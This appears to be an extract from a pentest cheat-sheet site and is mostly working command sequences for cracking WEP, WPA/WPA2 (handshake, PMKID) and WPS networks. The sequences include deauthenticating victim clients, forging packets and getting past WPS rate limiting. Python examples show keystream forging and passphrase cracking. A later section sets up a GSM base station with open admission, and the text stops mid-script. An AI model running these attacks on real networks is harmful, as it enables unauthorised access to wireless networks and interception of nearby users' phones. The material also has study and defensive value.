airmon-ng start wlan0 3 # only a particular channel : 3\nairodump-ng -c 3 --bssid $AP_MAC -w clearcap mon0 # dump traffic\n\n# fake authentication for a more reliable attack\naireplay-ng -1 0 -e $AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0\n\n# interactive replay attack (an encrypted ARP packet is between 68 and 86 bytes long)\naireplay-ng -2 -b $AP_MAC -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 mon0 # interactive - natural selection of a packet\naireplay-ng -2 -b $AP_MAC -t 1 -c FF:FF:FF:FF:FF:FF -p 0841 mon0  # interactive - force create a packet\n# Packet selection (an ARP request meets these characteristics):\n# - APs will always repeat packets destined to the broadcast address\n# - The packet will have the ToDS (To Distribution System) bit set to 1\n# answer \"y\" multiple times\n\n# cracking typically needs ~250000 IVs\naircrack-ng -0 -z -n 64 clientwep-01.cap\n    * -z: PTW attack\n    * -n: number of bits in the WEP key\n\n# replay a previously saved capture that contains an ARP packet\naireplay-ng -2 -r replay.cap mon0\n
"},{"location":"protocols/wifi/wifi-wep/#cracking-wep-without-a-client","title":"Cracking WEP without a Client","text":"

Prerequisite:

# put into monitor mode on our desired channel\nairmon-ng start wlan0 3 # only a particular channel : 3\nairodump-ng -c 3 --bssid $AP_MAC -w wepcrack mon0 # see no client\n\n# fake authentication attack with association timing (every 60s try to reassociate)\naireplay-ng -1 60 -e $AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0 # should see a client in airodump\n# -1 6000 to avoid a time out.\n
"},{"location":"protocols/wifi/wifi-wep/#fragmentation-attack","title":"Fragmentation attack","text":"

Goal: obtain 1500 bytes of PRGA (keystream). Note: Atheros cards do not generate the correct packets unless the wireless card is set to the MAC address you are spoofing.

# attacker mac must be associated (fake auth)\n# Press \"Y\" to use the offered packet\n# the recovered keystream is written to fragment-<timestamp>.xor (renamed to frag.xor below)\naireplay-ng -5 -b $AP_MAC -h $ATTACKER_MAC mon0\n\n# use our PRGA from the fragmentation attack to generate an ARP request\n# SRC_ADDR: 192.168.1.100 \n# DST_ADDR: 192.168.1.255, should not exist (broadcast address)\npacketforge-ng -0 -a $AP_MAC -h $ATTACKER_MAC -l $SRC_ADDR -k $DST_ADDR -y frag.xor -w inject.cap\n# -k: the destination IP i.e. in ARP, this is \"Who has this IP\"\n# -l: the source IP i.e. in ARP, this is \"Tell this IP\"\n\n# check the packet\ntcpdump -n -vvv -e -s0 -r inject.cap\n\n# inject our crafted packet (the AP re-broadcasts it with a fresh IV every time)\naireplay-ng -2 -r inject.cap mon0\n\n# crack the WEP key (airodump-ng -w wepcrack writes wepcrack-01.cap)\n# Aircrack-ng will auto-update when new IVs are available\naircrack-ng -0 wepcrack-01.cap\n\n# if 64-bit WEP is used, cracking time < 5 minutes \n# switch to 128-bit keys after 600000 IVs\n# use the `-f 4` fudge factor after 2000000 IVs\naircrack-ng -n 64 wepcrack-01.cap\n
"},{"location":"protocols/wifi/wifi-wep/#korek-chopchop-attack","title":"KoreK Chopchop attack","text":"

Can't be used against every AP, but might work when the fragmentation attack fails. Much slower than the fragmentation attack.

# chopchop attack: -4\n# outputs: the decrypted packet as replay_dec-<timestamp>.cap and the PRGA as replay_dec-<timestamp>.xor (renamed to prga.xor below)\n# Press \"Y\" (choose a small packet)\naireplay-ng -4 -b $AP_MAC -h $ATTACKER_MAC mon0\n\n# check the decrypted packet and find the network addresses\ntcpdump -n -vvv -e -s0 -r replay_dec-*.cap\n\n# use our PRGA from the chopchop attack to forge an ARP request\n# SRC_ADDR: 192.168.1.100 \n# DST_ADDR: 192.168.1.255, should not exist (broadcast address)\npacketforge-ng -0 -a $AP_MAC -h $ATTACKER_MAC -l $SRC_ADDR -k $DST_ADDR -y prga.xor -w chopchop_out.cap\n\n# inject our crafted packet\naireplay-ng -2 -r chopchop_out.cap mon0\n\n# crack the WEP key\naircrack-ng -0 wepcrack-01.cap\n
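The fragmentation and chopchop attacks above both end with a `.xor` file, and packetforge-ng turns that file into a valid frame without ever knowing the key. The added example below (not code from the page or from the aircrack-ng project) shows the arithmetic behind that: RC4 and the WEP framing are implemented from the standard, the 40-bit key, IV, MACs and the ARP payload are constructed values, and the keystream is recovered from one frame whose entire plaintext is known (the real attacks start from the 8 known LLC/SNAP bytes and grow the keystream from there; the XOR relation is the same). The 802.11 header and key-id byte are left out, so the frame is IV || RC4(plaintext || ICV).

```python
# Added example: why a recovered PRGA (keystream) lets packetforge-ng build WEP frames
# without the key. RC4 and WEP framing follow the standard; keys, IVs, MACs and payloads
# are constructed for this example.
import zlib

def rc4(key, length):
    # RC4 keystream generator (KSA + PRGA), returns `length` keystream bytes
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def icv(plaintext):
    # WEP integrity check value: CRC-32 of the plaintext, little-endian
    return zlib.crc32(plaintext).to_bytes(4, 'little')

def wep_encrypt(key, iv, plaintext):
    # per-packet RC4 key is IV || key; body = RC4(plaintext || ICV)
    data = plaintext + icv(plaintext)
    ks = rc4(iv + key, len(data))
    return iv + bytes(a ^ b for a, b in zip(data, ks))

def wep_decrypt(key, frame):
    # what the AP does on reception; returns the plaintext or None when the ICV fails
    iv, body = frame[:3], frame[3:]
    ks = rc4(iv + key, len(body))
    data = bytes(a ^ b for a, b in zip(body, ks))
    plaintext, tag = data[:-4], data[-4:]
    return plaintext if icv(plaintext) == tag else None

def recover_prga(frame, known_plaintext):
    # keystream for this IV = ciphertext XOR (known plaintext || its ICV); this is the
    # relation the fragmentation and chopchop attacks exploit, one fragment/byte at a time
    iv, body = frame[:3], frame[3:]
    known = known_plaintext + icv(known_plaintext)
    return iv, bytes(c ^ p for c, p in zip(body, known))

def forge_with_prga(iv, prga, new_plaintext):
    # packetforge-ng's step: reuse the IV and its keystream on a new plaintext, no key needed
    data = new_plaintext + icv(new_plaintext)
    if len(data) > len(prga):
        raise ValueError('need %d keystream bytes, have %d' % (len(data), len(prga)))
    return iv + bytes(a ^ b for a, b in zip(data, prga))

WEP_KEY = bytes.fromhex('0102030405')   # constructed 40-bit key, unknown to the attacker
IV = bytes.fromhex('a1b2c3')            # constructed IV observed on the air
LLC_SNAP_ARP = bytes.fromhex('aaaa030000000806')          # known for every ARP frame
ARP_REQUEST = bytes.fromhex('0001080006040001' '001122334455' 'c0a80164' '000000000000' 'c0a801ff')
CAPTURED = wep_encrypt(WEP_KEY, IV, LLC_SNAP_ARP + ARP_REQUEST)   # constructed 'sniffed' frame

def demo():
    # recover the keystream from the captured ARP request, then forge one with another sender IP
    iv, prga = recover_prga(CAPTURED, LLC_SNAP_ARP + ARP_REQUEST)
    forged_plain = LLC_SNAP_ARP + bytes.fromhex('0001080006040001' '001122334455' 'c0a80102' '000000000000' 'c0a801ff')
    forged = forge_with_prga(iv, prga, forged_plain)
    # the AP decrypts it with the real key and the ICV checks out: the frame is accepted
    return wep_decrypt(WEP_KEY, forged) == forged_plain

if __name__ == '__main__':
    print('forged frame accepted by the AP:', demo())
```

The forged frame reuses the IV, which is exactly why injecting it makes the AP re-broadcast with new IVs: the AP decrypts, accepts and re-encrypts it under its own IV sequence, and those fresh IVs are what aircrack-ng needs.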
"},{"location":"protocols/wifi/wifi-wep/#bypassing-wep-shared-key-authentication-ska","title":"Bypassing WEP Shared Key Authentication SKA","text":"

By default, most wireless drivers will attempt open authentication first. If open authentication fails, they will proceed to try shared authentication.

Prerequisite:

# put into monitor mode on our desired channel\nairmon-ng start wlan0 3 # only a particular channel : 3\nairodump-ng -c 3 --bssid $AP_MAC -w sharedkey mon0\n\n# deauthentication attack on the connected client\n# airodump should display SKA under the AUTH column once the client re-authenticates\n# airodump saves the PRGA recovered from the shared key exchange as sharedkey-01-<AP_MAC>.xor\naireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0\n# or a longer burst: aireplay-ng -0 10 -a $AP_MAC -c $VICTIM_MAC mon0\n\n# fake authentication attack with association timing (every 60s try to reassociate)\n# should display \"switching to Shared Key Authentication\"\n# If you are using a PRGA file obtained from a chopchop attack, make sure that it is at least 144 bytes long\n# If you get \"Part2: Association Not answering...(Step3)\" -> spoof the MAC address of the real client for the fake auth\naireplay-ng -1 60 -e $AP_SSID -y sharedkey-01-*.xor -b $AP_MAC -h $ATTACKER_MAC mon0\n\n# ARP replay attack\naireplay-ng -3 -b $AP_MAC -h $ATTACKER_MAC mon0\n\n# deauthentication attack on the connected client\n# speed up the ARP replay by forcing the client to send a new ARP request\naireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0\n# equivalent long form: aireplay-ng --deauth 1 -a $AP_MAC -c $VICTIM_MAC wlan0mon\n\n# crack the WEP key\naircrack-ng sharedkey-01.cap\n
"},{"location":"protocols/wifi/wifi-wep/#references","title":"References","text":""},{"location":"protocols/wifi/wifi-wpa/","title":"Wifi - WPA Cracking","text":""},{"location":"protocols/wifi/wifi-wpa/#tools","title":"Tools","text":""},{"location":"protocols/wifi/wifi-wpa/#wpa-psk-attack","title":"WPA PSK Attack","text":""},{"location":"protocols/wifi/wifi-wpa/#cracking-wpa-with-john-the-ripper","title":"Cracking WPA with John the Ripper","text":"
# put into monitor mode on our desired channel\nairmon-ng start wlan0 3 # only a particular channel : 3\nairodump-ng -c 3 --bssid $AP_MAC -w wpajohn mon0 # wait for a connected client\n\n# deauthentication to get the WPA handshake (airodump shows \"WPA handshake\" once the 4-way handshake is captured)\naireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0\n\n# crack without john the ripper (-b <BSSID> selects the network when the capture holds several)\naircrack-ng -0 -w /pentest/passwords/john/password.lst wpajohn-01.cap\naircrack-ng -w password.lst,secondlist.txt wpajohn-01.cap # multiple dicts\n\n# crack with john the ripper - combine mangling rules with aircrack\n# rules example to add in /pentest/passwords/john/john.conf\n# $[0-9]$[0-9]\n# $[0-9]$[0-9]$[0-9]\n# -w - reads the candidates from stdin, -e selects the network by ESSID\njohn --wordlist=/pentest/wireless/aircrack-ng/test/password.lst --rules --stdout | aircrack-ng -0 -e $AP_SSID -w - wpajohn-01.cap\n\n# generate PMKs for a faster cracking - Precomputed WPA Keys Database Attack\n# the PMK is derived from passphrase AND ESSID, so the table only serves that ESSID\necho wifu > essid.txt\nairolib-ng test.db --import essid essid.txt\nairolib-ng test.db --stats\nairolib-ng test.db --import passwd /pentest/passwords/john/password.lst\nairolib-ng test.db --batch\nairolib-ng test.db --stats\naircrack-ng -r test.db wpajohn-01.cap\n# airolib-ng test.db --clean all\n\n# Not in lab - Convert to hccap to use with John Jumbo\naircrack-ng <FileName>.cap -J <outFile>\nhccap2john <outFile>.hccap > <JohnOutFile>\njohn <JohnOutFile>\n
"},{"location":"protocols/wifi/wifi-wpa/#cracking-wpa-with-cowpatty","title":"Cracking WPA with coWPAtty","text":"

Better for PMK Rainbow table attacks

# put into monitor mode on our desired channel\nairmon-ng start wlan0 3 # only a particular channel : 3\nairodump-ng -c 3 --bssid $AP_MAC -w wpacow mon0 # wait for a connected client\n\n# deauthentication to get the WPA handshake\naireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0\n\n# coWPAtty dictionary mode (slow)\ncowpatty -r wpacow-01.cap -f /pentest/passwords/john/password.lst -2 -s $AP_SSID\n\n# coWPAtty rainbow table mode (fast): genpmk precomputes the PMKs for this ESSID\ngenpmk -f /pentest/passwords/john/password.lst -d wifuhashes -s $AP_SSID\ncowpatty -r wpacow-01.cap -d wifuhashes -2 -s $AP_SSID\n
"},{"location":"protocols/wifi/wifi-wpa/#cracking-wpa-with-pyrit","title":"Cracking WPA with Pyrit","text":"

Can use GPU

# put into monitor mode on our desired channel\nairmon-ng start wlan0 3 # only a particular channel : 3\nairodump-ng -c 3 --bssid $AP_MAC -w wpapyrit mon0 # wait for a connected client\n\n# deauthentication to get the WPA handshake\naireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0\n\n# clean the cap and keep only the packets needed for cracking\npyrit -r wpapyrit-01.cap analyze\npyrit -r wpapyrit-01.cap -o wpastripped.cap strip\n\n# dictionary attack - slowest (every PMK is computed on the fly)\npyrit -r wpapyrit-01.cap -i /pentest/passwords/john/password.lst -b $AP_MAC attack_passthrough\n\n# pre-computed hashes attack - slow on CPU\npyrit eval # pwds in database\npyrit -i /pentest/passwords/john/password.lst import_passwords # import in the database\npyrit -e $AP_SSID create_essid\npyrit batch # generate the PMKs\npyrit -r wpastripped.cap attack_db\n\n# GPU attack - same workflow, fast once pyrit lists a GPU core\npyrit list_cores\npyrit -i /pentest/passwords/john/password.lst import_passwords # import in the database\npyrit -e $AP_SSID create_essid\npyrit batch\npyrit -r wpastripped.cap attack_db\n
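Every tool in the three sections above (aircrack-ng with or without John, coWPAtty, Pyrit) does the same arithmetic on a captured 4-way handshake: derive the PMK from the candidate passphrase and the ESSID, expand it to the PTK, and check whether the first 16 bytes of the PTK (the KCK) reproduce the MIC carried in message 2. The added example below (not code from the page or from any of those projects) spells that out in Python. The ESSID/passphrase pair IEEE/password is the IEEE 802.11i Annex H test vector; the MACs, nonces and the EAPOL message 2 are constructed here, not taken from a capture, so the block builds its own handshake and then cracks it.

```python
# Added example: what aircrack-ng / coWPAtty / Pyrit compute per candidate passphrase.
# SSID/passphrase from the 802.11i Annex H vector; MACs, nonces and EAPOL frame constructed.
import hashlib
import hmac

def pmk_from_passphrase(passphrase, ssid):
    # PSK -> PMK: PBKDF2-HMAC-SHA1, 4096 iterations, 256 bits; this is the slow step every tool optimises
    return hashlib.pbkdf2_hmac('sha1', passphrase.encode(), ssid.encode(), 4096, 32)

def prf512(pmk, aa, spa, anonce, snonce):
    # 802.11i PRF-512: PTK = PRF(PMK, 'Pairwise key expansion', min(AA,SPA)||max(AA,SPA)||min(nonces)||max(nonces))
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b''
    for i in range(4):
        out += hmac.new(pmk, b'Pairwise key expansion' + bytes(1) + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]

def eapol_mic(kck, eapol_frame):
    # WPA2/CCMP (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with the MIC field zeroed)[:16]
    zeroed = eapol_frame[:81] + bytes(16) + eapol_frame[97:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]

def check_passphrase(passphrase, ssid, aa, spa, anonce, snonce, eapol_m2):
    # True when the candidate reproduces the MIC carried in message 2 of the handshake
    kck = prf512(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    return hmac.compare_digest(eapol_mic(kck, eapol_m2), eapol_m2[81:97])

def crack(wordlist, ssid, aa, spa, anonce, snonce, eapol_m2):
    for candidate in wordlist:
        if check_passphrase(candidate, ssid, aa, spa, anonce, snonce, eapol_m2):
            return candidate
    return None

# constructed handshake parameters (assumed values, not from a real capture)
SSID = 'IEEE'
AA = bytes.fromhex('001122334455')     # AP MAC
SPA = bytes.fromhex('66778899aabb')    # station MAC
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))

def build_m2(passphrase):
    # EAPOL-Key message 2 as the station would send it: MIC sits at bytes 81..97, no key data
    frame = bytearray()
    frame += bytes([1, 3]) + (95).to_bytes(2, 'big')   # EAPOL version 1, type Key, body length
    frame += bytes([2])                                # descriptor type: RSN
    frame += bytes([1, 0x0a])                          # key info: version 2 (HMAC-SHA1), pairwise, MIC
    frame += bytes([0, 16])                            # key length
    frame += (1).to_bytes(8, 'big')                    # replay counter
    frame += SNONCE + bytes(16) + bytes(8) + bytes(8)  # key nonce, IV, RSC, ID
    frame += bytes(16)                                 # MIC placeholder
    frame += bytes(2)                                  # key data length
    kck = prf512(pmk_from_passphrase(passphrase, SSID), AA, SPA, ANONCE, SNONCE)[:16]
    frame[81:97] = eapol_mic(kck, bytes(frame))
    return bytes(frame)

M2 = build_m2('password')   # handshake produced with the Annex H passphrase

if __name__ == '__main__':
    print('PMK:', pmk_from_passphrase('password', SSID).hex())
    print('cracked:', crack(['letmein', 'wifu', 'password'], SSID, AA, SPA, ANONCE, SNONCE, M2))
```

Only the PBKDF2 step depends on the ESSID and not on the capture, which is why airolib-ng, genpmk and `pyrit batch` can precompute it per ESSID and why a rainbow table built for one network is useless against another.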
"},{"location":"protocols/wifi/wifi-wpa/#cracking-wpa-with-bettercap","title":"Cracking WPA with bettercap","text":""},{"location":"protocols/wifi/wifi-wpa/#wpa-wps-attack","title":"WPA WPS Attack","text":"
airmon-ng start wlan0\nairodump-ng mon0\n\n# Install (either the t6x fork, which integrates pixiewps, or the distribution package)\napt-get -y install build-essential libpcap-dev aircrack-ng pixiewps\ngit clone https://github.com/t6x/reaver-wps-fork-t6x\n# or: apt-get install reaver\n\n# wash: Reaver's WPS scanner (airodump-ng also lists WPS-enabled networks)\n# wash shows whether WPS is locked or not\n# a locked WPS has lower chances of success\nwash -i mon0 \n\n# Launch Reaver\n# -S: use small DH keys to speed up the WPS exchange\nreaver -i mon0 -b $AP_MAC -vv -S\nreaver -i mon0 -c <Channel> -b $AP_MAC -p <PinCode> -vv -S\nreaver -i mon0 -c 6 -b 00:23:69:48:33:95 -vv\n\n\n# Now using pixiewps, you can crack the PIN offline (Pixie Dust) from the values reaver -vv prints\npixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce>\n# Then, you can use the PIN with reaver to get the cleartext password\nreaver -i <monitor interface> -b <bssid> -c <channel>  -p <PIN>\n\n\n# Some manufacturers have implemented protections\n# You can try different switches to bypass\n# -L = Ignore locked state\n# -N = Don't send NACK packets when errors are detected\n# -d = delay X seconds between PIN attempts\n# -T = set timeout period to X second (.5 means half second)\n# -r = After X attempts, sleep for Y seconds\nreaver -i mon0 -c 6 -b 00:23:69:48:33:95  -vv -L -N -d 15 -T .5 -r 3:15\n
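The reason reaver's online brute force is feasible at all is the structure of the WPS PIN: the registrar protocol acknowledges the first four digits separately (an M4 NACK tells the attacker the first half is wrong) and the eighth digit is a checksum of the other seven, so the search is 10^4 + 10^3 = 11,000 attempts at most instead of 10^8. The added example below (not code from the page or from reaver) implements the checksum and simulates that two-stage search against a constructed target PIN; the AP is stood in for by a plain string comparison.

```python
# Added example: WPS PIN checksum and reaver's two-stage online search. Standard WPS
# arithmetic; the target PINs are constructed, the AP is simulated by string comparison.
def wps_checksum(first7):
    # 8th digit: digits at odd positions (1st, 3rd, 5th, 7th) weigh 3, the others weigh 1,
    # and the checksum makes the total a multiple of 10
    digits = [int(c) for c in '%07d' % first7]
    acc = sum(d * (3 if i % 2 == 0 else 1) for i, d in enumerate(digits))
    return (10 - acc % 10) % 10

def wps_pin_is_valid(pin):
    pin = '%08d' % int(pin)
    return wps_checksum(int(pin[:7])) == int(pin[7])

def full_pin(first4, second3):
    # assemble an 8-digit PIN from the two halves reaver guesses independently
    pin7 = int('%04d%03d' % (first4, second3))
    return '%07d%d' % (pin7, wps_checksum(pin7))

def brute_force(target_pin):
    # stage 1: 10^4 guesses for the first half (the M4 NACK leaks when it is right)
    # stage 2: 10^3 guesses for the second half, the checksum digit being derived
    attempts = 0
    for first in range(10000):
        attempts += 1
        if '%04d' % first == target_pin[:4]:   # simulated AP: M4 accepted
            break
    for second in range(1000):
        attempts += 1
        pin = full_pin(first, second)
        if pin == target_pin:                  # simulated AP: M6/M7 accepted, PIN found
            return pin, attempts
    return None, attempts

if __name__ == '__main__':
    print(full_pin(1234, 567), brute_force('12345670'))
```

With rate limiting (`-d`, `-r`, the "Detected AP rate limiting" warning) the 11,000 attempts are what stretches a run to hours; Pixie Dust removes the online part entirely when the AP's nonces are weak.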

The message "WARNING: Detected AP rate limiting, waiting 315 seconds before re-trying" means the AP is protected. The message "WARNING: Receive timeout occurred" means the AP is too far away.

"},{"location":"protocols/wifi/wifi-wpa/#wpa-pmkid-attack","title":"WPA PMKID Attack","text":"
INTERFACE=$(ifconfig | grep wlp | cut -d\":\" -f1) # e.g. wlp2s0, or mon0\n\n# PMKID capture\n# Note: Based on the noise on the wifi channel it can take some time to receive the PMKID. \n# It can take a while to capture the PMKID (several minutes++)\n# We recommend running hcxdumptool up to 10 minutes before aborting.\n# If an AP receives our association request packet and supports sending \n# sudo hcxdumptool -i wlan0mon -o outfile.pcapng --enable_status=1\nPMKID=$(sudo hcxdumptool -o test.pcapng -i $INTERFACE --enable_status  --filtermode=2)\necho $PMKID|grep 'FOUND PMKID' &> /dev/null\nhcxpcaptool -z test.16800 test.pcapng\n\n# Then convert the captured data to a suitable format for hashcat\n# -E retrieve possible passwords from WiFi-traffic (additional, this list will include ESSIDs)\n# -I retrieve identities from WiFi-traffic\n# -U retrieve usernames from WiFi-traffic\n# line format: PMKID*MAC AP*MAC Station*ESSID (hex encoded)\n# 2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a\nhcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng\n\n# Cracking the HASH\n# (recent hashcat releases replaced mode 16800 with 22000, fed by hcxpcapngtool instead of hcxpcaptool)\nhashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'\nhashcat -m 16800 -d 1 -w 3 myHashes rockyou.txt \n\n# If hashcat reports clGetPlatformIDs(): CL_PLATFORM_NOT_FOUND_KHR, no OpenCL platform (GPU/CPU driver) is installed\n

Bettercap WPA - PMKID attack

wifi.assoc all\n/path/to/hcxpcaptool -z bettercap-wifi-handshakes.pmkid /root/bettercap-wifi-handshakes.pcap\n/path/to/hashcat -m16800 -a3 -w3 bettercap-wifi-handshakes.pmkid '?d?d?d?d?d?d?d?d'\n
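What makes the PMKID attack attractive is visible in the hash line format above: the PMKID is an HMAC over the PMK and the two MAC addresses, sent by the AP in the first EAPOL frame, so neither a connected client nor a full 4-way handshake is needed. The added example below (not code from the page, hcxtools, hashcat or bettercap) computes a PMKID, writes it in the `PMKID*APMAC*STAMAC*ESSIDhex` format hashcat mode 16800 expects, parses it back and cracks it with a wordlist. The ESSID/passphrase pair IEEE/password is the 802.11i Annex H vector; the two MAC addresses are the ones from the sample line above, reused here as constructed values.

```python
# Added example: PMKID computation, hashcat 16800 line format, and a wordlist attack on it.
# ESSID/passphrase from the 802.11i Annex H vector; MAC addresses are constructed values.
import hashlib
import hmac

def pmk_from_passphrase(passphrase, ssid):
    # PSK -> PMK: PBKDF2-HMAC-SHA1, 4096 iterations, 256 bits
    return hashlib.pbkdf2_hmac('sha1', passphrase.encode(), ssid.encode(), 4096, 32)

def pmkid(pmk, ap_mac, sta_mac):
    # PMKID = HMAC-SHA1-128(PMK, 'PMK Name' || AA || SPA): the AP includes it in EAPOL message 1
    return hmac.new(pmk, b'PMK Name' + ap_mac + sta_mac, hashlib.sha1).digest()[:16]

def format_16800(pmk, ap_mac, sta_mac, ssid):
    # the line hcxpcaptool -z writes: PMKID*APMAC*STAMAC*ESSID, all hex
    return '*'.join([pmkid(pmk, ap_mac, sta_mac).hex(), ap_mac.hex(), sta_mac.hex(), ssid.encode().hex()])

def parse_16800(line):
    pmkid_hex, aa, spa, essid_hex = line.strip().split('*')
    return bytes.fromhex(pmkid_hex), bytes.fromhex(aa), bytes.fromhex(spa), bytes.fromhex(essid_hex).decode()

def crack_16800(line, wordlist):
    # what hashcat -m 16800 does per candidate: PBKDF2, then one HMAC, then compare
    target, aa, spa, ssid = parse_16800(line)
    for candidate in wordlist:
        if hmac.compare_digest(pmkid(pmk_from_passphrase(candidate, ssid), aa, spa), target):
            return candidate
    return None

AP_MAC = bytes.fromhex('4604ba734d4e')    # constructed (from the sample line above)
STA_MAC = bytes.fromhex('89acf0e761f4')   # constructed
HASH_LINE = format_16800(pmk_from_passphrase('password', 'IEEE'), AP_MAC, STA_MAC, 'IEEE')

if __name__ == '__main__':
    print(HASH_LINE)
    print('cracked:', crack_16800(HASH_LINE, ['wifu', 'letmein', 'password']))
```

Because the PMKID depends only on the PMK and the two MACs, an AP that answers association requests with a PMKID hands out crackable material to anyone in range; disabling PMKID caching (or using WPA3/SAE) is the mitigation on the AP side.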
"},{"location":"protocols/wifi/wifi-wpa/#references","title":"References","text":""},{"location":"radio-frequency/limesdr-bts/","title":"GSM Network: LimeSDR","text":"

DISCLAIMER: This procedure is highly illegal basically anywhere in the world. Be sure to run this in a closed RF environment (also known as a Faraday cage).

"},{"location":"radio-frequency/limesdr-bts/#running-a-gsm-station-with-osmo-network-in-a-box","title":"Running a GSM Station with osmo network-in-a-box","text":"

For this example we will use the Osmocom GSM stack in NITB (Network In The Box) mode. In this mode the phones connected to your BTS will be able to call each other and send SMS messages. There is also the interconnect mode, in which the BSC (Base Station Controller) connects to an ISDN or IP-PBX (for example Asterisk) to manage the connected phones. You can check the different modes here: https://osmocom.org/projects/openbsc/wiki/OpenBSC#Configurations-Modes

For this article I will be using Ubuntu 18.04 LTS as the operating system, since LimeMicro provides pre-compiled packages that help a lot. It should run on any Linux distribution provided that it has the required packages and/or you compile the missing ones. I might make a tutorial later about how to install from source, but for now I will stick to the pre-compiled packages.

"},{"location":"radio-frequency/limesdr-bts/#installing-the-required-packages","title":"Installing the required packages","text":"

The first thing we need to do is install all the required packages. LimeMicro did nice work and gathered everything pre-compiled in their PPAs, so let's add them first:

sudo add-apt-repository -y ppa:myriadrf/drivers\nsudo add-apt-repository -y ppa:myriadrf/gnuradio\n

Let\u2019s also add the osmocom binary builds:

wget https://download.opensuse.org/repositories/network:/osmocom:/latest/xUbuntu_18.04/Release.key\nsudo apt-key add Release.key\nrm Release.key\necho \"deb https://download.opensuse.org/repositories/network:/osmocom:/latest/xUbuntu_18.04/ ./\" | sudo tee /etc/apt/sources.list.d/osmocom-latest.list\nsudo apt-get update\n

Then we can install required packages:

sudo apt install osmocom-nitb osmo-trx-lms osmo-bts-trx limesuite\n

These packages are:

"},{"location":"radio-frequency/limesdr-bts/#updating-the-limesdr-firmware","title":"Updating the LimeSDR Firmware","text":"

It is good practice to check that your LimeSDR firmware is up to date. To check, and update if needed, you only need to run:

LimeUtil --update\n

It should do everything that is needed to update

"},{"location":"radio-frequency/limesdr-bts/#creating-the-configuration-files","title":"Creating the configuration files","text":"

There are few files that need to be created. Let\u2019s first start with the OpenBSC config file openbsc.cfg:

!\n! OpenBSC configuration saved from vty\n!   !\npassword foo\n!\nline vty\n no login\n!\ne1_input\n e1_line 0 driver ipa\nnetwork\n network country code 901\n mobile network code 70\n short name HUEHUE\n long name HUEBRNetwork\n auth policy accept-all\n location updating reject cause 13\n encryption a5 0\n neci 1\n rrlp mode none\n mm info 1\n handover 0\n handover window rxlev averaging 10\n handover window rxqual averaging 1\n handover window rxlev neighbor averaging 10\n handover power budget interval 6\n handover power budget hysteresis 3\n handover maximum distance 9999\n bts 0\n  type sysmobts\n  band GSM900\n  cell_identity 0\n  location_area_code 1\n  training_sequence_code 7\n  base_station_id_code 63\n  ms max power 15\n  cell reselection hysteresis 4\n  rxlev access min 0\n  channel allocator ascending\n  rach tx integer 9\n  rach max transmission 7\n  ip.access unit_id 1801 0\n  oml ip.access stream_id 255 line 0\n  gprs mode none\n  trx 0\n   rf_locked 0\n   arfcn 100\n   nominal power 23\n   max_power_red 20\n   rsl e1 tei 0\n   timeslot 0\n    phys_chan_config CCCH+SDCCH4\n   timeslot 1\n    phys_chan_config SDCCH8\n   timeslot 2\n    phys_chan_config TCH/F\n   timeslot 3\n    phys_chan_config TCH/F\n   timeslot 4\n    phys_chan_config TCH/F\n   timeslot 5\n    phys_chan_config TCH/F\n   timeslot 6\n    phys_chan_config TCH/F\n   timeslot 7\n    phys_chan_config TCH/F\n
There are several parameters here, but I will only describe the ones you might want to change:

network country code 901\nmobile network code 70\nshort name HUEHUE\nlong name HUEBRNetwork\nauth policy accept-all\n

Be careful with these settings, especially combined with an accept-all policy. If you set them to the codes of an existing mobile operator, any phone close to your LimeSDR may connect to it. The operator name (at least on an Android device) only appears after connecting to it.
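A small check for exactly those settings, as an added example that is not part of the original article or of the Osmocom project: it parses the `network` block of an openbsc.cfg in the layout shown above (one-space indentation for the block's own settings) and reports an accept-all auth policy, A5/0 (no air-interface encryption) and a PLMN code outside an allowlist of lab codes. The allowlist default is an assumption for the example (001-01 is the test PLMN); the configuration text embedded below is constructed from the lines of the page's config.

```python
# Added example: audit the network block of an OpenBSC/osmo-nitb config for the settings
# the warning above is about. LAB_PLMNS is an assumed allowlist; CONFIG is constructed.
LAB_PLMNS = {('001', '01')}   # assumed: the test PLMN; add the codes your lab/licence covers

def parse_network_block(cfg_text):
    # returns {'network country code': '901', 'auth policy': 'accept-all', ...} for the
    # one-space-indented settings directly under the top-level 'network' node
    settings = {}
    in_network = False
    for line in cfg_text.splitlines():
        if not line.strip() or line.lstrip().startswith('!'):
            continue                                   # blank line or comment
        if not line.startswith(' '):
            in_network = (line.strip() == 'network')   # a new top-level node
            continue
        if in_network and not line.startswith('  '):   # skip nested bts/trx/timeslot lines
            words = line.split()
            settings[' '.join(words[:-1])] = words[-1]
    return settings

def audit(cfg_text, allowed_plmns=LAB_PLMNS):
    s = parse_network_block(cfg_text)
    findings = []
    mcc, mnc = s.get('network country code'), s.get('mobile network code')
    if mcc and mnc and (mcc, mnc.zfill(2)) not in allowed_plmns:
        findings.append('PLMN %s-%s is not an allowlisted lab code: nearby phones may camp on this cell' % (mcc, mnc))
    if s.get('auth policy') == 'accept-all':
        findings.append('auth policy accept-all: every IMSI is admitted, use closed or token instead')
    if s.get('encryption a5') == '0':
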